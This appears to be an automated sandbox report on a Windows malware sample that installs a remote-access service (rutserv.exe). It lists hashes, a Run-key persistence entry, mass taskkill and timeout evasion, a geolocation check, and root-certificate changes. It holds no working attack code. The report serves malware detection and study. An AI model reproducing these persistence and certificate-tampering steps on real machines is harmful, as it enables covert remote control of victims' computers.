ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb

Analysis

max time kernel
146s
max time network
151s
platform
windows10_x64
resource
win10v20201028
submitted
01-11-2020 10:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe
Size

4.9MB
MD5

8817ae0956677b821ae053b7fff41968
SHA1

a0e0577c501355b80f7d1240cf9b850598bc0730
SHA256

ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb
SHA512

0d0e7d149d7bf6217b9e169fbcb8a85460f8d20f1868b2ae6f686e2211f6cf6c2fa89831d72d8a34c4135252d5b99d48203cac58490c38411c98e9f0447c9883

Score

10^/10

persistence

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

svchost.exe

description pid process target process

PID 2840 created 1020 2840 svchost.exe rutserv.exe
Executes dropped EXE 3 IoCs

Processes:

ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmprutserv.exerutserv.exe

pid process

1780 ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp
1020 rutserv.exe
2032 rutserv.exe

description	pid	process	target process
PID 2840 created 1020	2840	svchost.exe	rutserv.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

rutserv.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Control Panel\International\Geo\Nation	rutserv.exe

Loads dropped DLL 4 IoCs

Processes:

rutserv.exerutserv.exe

pid process

1020 rutserv.exe
1020 rutserv.exe
2032 rutserv.exe
2032 rutserv.exe

pid	process
1020	rutserv.exe
1020	rutserv.exe
2032	rutserv.exe
2032	rutserv.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\nots = "C:\\ProgramData\\Immunity\\rutserv.exe"	reg.exe

JavaScript code in executable 3 IoCs

Processes:

resource	yara_rule
C:\ProgramData\Immunity\libeay32.dll	js
\ProgramData\Immunity\libeay32.dll	js
\ProgramData\Immunity\libeay32.dll	js

Drops file in System32 directory 12 IoCs

Processes:

rutserv.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\378B079587A9184B2E2AB859CB263F40_524AD1B9B08D3C6450727265AE77B7D2	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\378B079587A9184B2E2AB859CB263F40_524AD1B9B08D3C6450727265AE77B7D2	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EB35376744F392396307460D546222D_EC1C46868A78521D3A7ED5209EF9CB19	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EB35376744F392396307460D546222D_EC1C46868A78521D3A7ED5209EF9CB19	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C86BD7751D53F10F65AAAD66BBDF33C7	rutserv.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C86BD7751D53F10F65AAAD66BBDF33C7	rutserv.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

1812 timeout.exe
4672 timeout.exe

pid	process
1812	timeout.exe
4672	timeout.exe

Kills process with taskkill 100 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
3052	taskkill.exe
4560	taskkill.exe
1716	taskkill.exe
2644	taskkill.exe
3988	taskkill.exe
3968	taskkill.exe
4136	taskkill.exe
4368	taskkill.exe
4492	taskkill.exe
4940	taskkill.exe
2604	taskkill.exe
4308	taskkill.exe
4600	taskkill.exe
2184	taskkill.exe
3952	taskkill.exe
512	taskkill.exe
2676	taskkill.exe
2196	taskkill.exe
2052	taskkill.exe
4024	taskkill.exe
1112	taskkill.exe
2360	taskkill.exe
3956	taskkill.exe
4088	taskkill.exe
3752	taskkill.exe
2596	taskkill.exe
2264	taskkill.exe
2180	taskkill.exe
3276	taskkill.exe
1252	taskkill.exe
2924	taskkill.exe
5068	taskkill.exe
3884	taskkill.exe
4176	taskkill.exe
3524	taskkill.exe
3924	taskkill.exe
3720	taskkill.exe
4272	taskkill.exe
4304	taskkill.exe
4604	taskkill.exe
4668	taskkill.exe
4060	taskkill.exe
4232	taskkill.exe
4116	taskkill.exe
4016	taskkill.exe
1880	taskkill.exe
3784	taskkill.exe
1672	taskkill.exe
3396	taskkill.exe
2740	taskkill.exe
4168	taskkill.exe
2576	taskkill.exe
4972	taskkill.exe
4748	taskkill.exe
3548	taskkill.exe
3376	taskkill.exe
2772	taskkill.exe
3192	taskkill.exe
1220	taskkill.exe
4844	taskkill.exe
4356	taskkill.exe
3892	taskkill.exe
4236	taskkill.exe
4636	taskkill.exe

Modifies data under HKEY_USERS 45 IoCs

Processes:

rutserv.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	rutserv.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@C:\Windows\SysWOW64\FirewallControlPanel.dll,-12122 = "Windows Firewall"	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	rutserv.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	rutserv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	rutserv.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

rutserv.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 0400000001000000100000008ccadc0b22cef5be72ac411a11a8d81203000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b817e00000001000000080000000040d0d1b0ffd4017f000000010000000c000000300a06082b060105050703010b000000010000000e00000074006800610077007400650000001d00000001000000100000005b3b67000eeb80022e42605b6b3b72401400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748506200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f53000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703010f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce2000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 190000000100000010000000dc73f9b71e16d51d26527d32b11a6a3d0f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce09000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c06200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f1400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748501d00000001000000100000005b3b67000eeb80022e42605b6b3b72400b000000010000000e00000074006800610077007400650000007f000000010000000c000000300a06082b060105050703017e00000001000000080000000040d0d1b0ffd40103000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b810400000001000000100000008ccadc0b22cef5be72ac411a11a8d8122000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	rutserv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 0f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce09000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030153000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c06200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f1400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748501d00000001000000100000005b3b67000eeb80022e42605b6b3b72400b000000010000000e00000074006800610077007400650000007f000000010000000c000000300a06082b060105050703017e00000001000000080000000040d0d1b0ffd40103000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b812000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68	rutserv.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\91C6D6EE3E8AC86384E548C299295C756C817B81\Blob = 5c0000000100000004000000000800000400000001000000100000008ccadc0b22cef5be72ac411a11a8d81203000000010000001400000091c6d6ee3e8ac86384e548c299295c756c817b817e00000001000000080000000040d0d1b0ffd4017f000000010000000c000000300a06082b060105050703010b000000010000000e00000074006800610077007400650000001d00000001000000100000005b3b67000eeb80022e42605b6b3b72401400000001000000140000007b5b45cfafcecb7afd31921a6ab6f346eb5748506200000001000000200000008d722f81a9c113c0791df136a2966db26c950a971db46b4199f4ea54b78bfb9f53000000010000002500000030233021060b6086480186f8450107300130123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030206082b0601050507030306082b0601050507030406082b060105050703010f000000010000001400000085fef11b4f47fe3952f98301c9f98976fefee0ce190000000100000010000000dc73f9b71e16d51d26527d32b11a6a3d2000000001000000240400003082042030820308a0030201020210344ed55720d5edec49f42fce37db2b6d300d06092a864886f70d01010505003081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f74204341301e170d3036313131373030303030305a170d3336303731363233353935395a3081a9310b300906035504061302555331153013060355040a130c7468617774652c20496e632e31283026060355040b131f43657274696669636174696f6e205365727669636573204469766973696f6e31383036060355040b132f2863292032303036207468617774652c20496e632e202d20466f7220617574686f72697a656420757365206f6e6c79311f301d06035504031316746861777465205072696d61727920526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100aca0f0fb8059d49cc7a4cf9da159730910450c0d2c6e68f16c5b4868495937fc0b3319c2777fcc102d95341ce6eb4d09a71cd2b8c9973602b789d4245f06c0cc4494948d02626feb5add118d289a5c8490107a0dbd74662f6a38a0e2d55444eb1d079f07ba6feee9fd4e0b29f53e84a001f19cabf81c7e89a4e8a1d871650da3517beebcd222600db95b9ddfbafc515b0baf98b2e92ee904e86287de2bc8d74ec14c641eddcf8758ba4a4fca68071d1c9d4ac6d52f91cc7c71721cc5c067eb32fdc9925c94da85c09bbf537d2b09f48c9d911f976a52cbde0936a477d87b875044d53e6e2969fb3949261e09a5807b402debe82785c9fe61fd7ee67c971dd59d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147b5b45cfafcecb7afd31921a6ab6f346eb574850300d06092a864886f70d010105050003820101007911c04bb391b6fcf0e967d40d6e45be55e893d2ce033fedda25b01d57cb1e3a76a04cec5076e864720ca4a9f1b88bd6d68784bb32e54111c077d9b3609deb1bd5d16e4444a9a601ec55621d77b85c8e48497c9c3b5711acad73378e2f785c906847d96060e6fc073d222017c4f716e9c4d872f9c8737cdf162f15a93efd6a27b6a1eb5aba981fd5e34d640a9d13c861baf5391c87bab8bd7b227ff6feac4079e5ac106f3d8f1b79768bc437b3211884e53600eb632099b9e9fe3304bb41c8c102f94463209e81ce42d3d63f2c76d3639c59dd8fa6e10ea02e41f72e9547cfbcfd33f3f60b617e7e912b8147c22730eea7105d378f5c392be404f07b8d568c68	rutserv.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	rutserv.exe
